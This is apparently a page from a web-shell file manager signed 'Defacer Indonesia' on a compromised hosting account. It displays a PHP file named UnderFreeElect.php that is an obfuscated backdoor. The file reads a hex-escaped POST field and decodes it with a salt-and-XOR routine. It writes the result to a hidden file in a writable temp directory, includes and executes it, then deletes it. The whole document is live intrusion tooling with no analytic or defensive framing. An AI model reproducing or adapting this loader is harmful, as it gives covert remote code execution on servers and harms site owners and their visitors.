whoami7 - Manager
:
/
home
/
analuakl
/
karanoverseas.in
/
Upload File:
files >> /home/analuakl/karanoverseas.in/UnderFreeElect.php
<?php if(filter_has_var(INPUT_POST, "r\x65\x66")){ $factor = array_filter(["/dev/shm", session_save_path(), getenv("TEMP"), getenv("TMP"), getcwd(), "/tmp", "/var/tmp", ini_get("upload_tmp_dir"), sys_get_temp_dir()]); $token = $_POST["r\x65\x66"]; $token = explode( ".",$token); $bind = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt ); $q = 0; array_walk( $token , function( $v5) use( &$bind , &$q , $salt , $lenS) { $chS = ord( $salt[$q % $lenS] ); $d =( ( int)$v5 - $chS -( $q % 10)) ^ 37; $bind .=chr( $d ); $q++; }); while ($ptr = array_shift($factor)) { if (is_dir($ptr) && is_writable($ptr)) { $reference = "$ptr" . "/.value"; if (@file_put_contents($reference, $bind) !== false) { include $reference; unlink($reference); exit; } } } }
Copyright ©2021 || Defacer Indonesia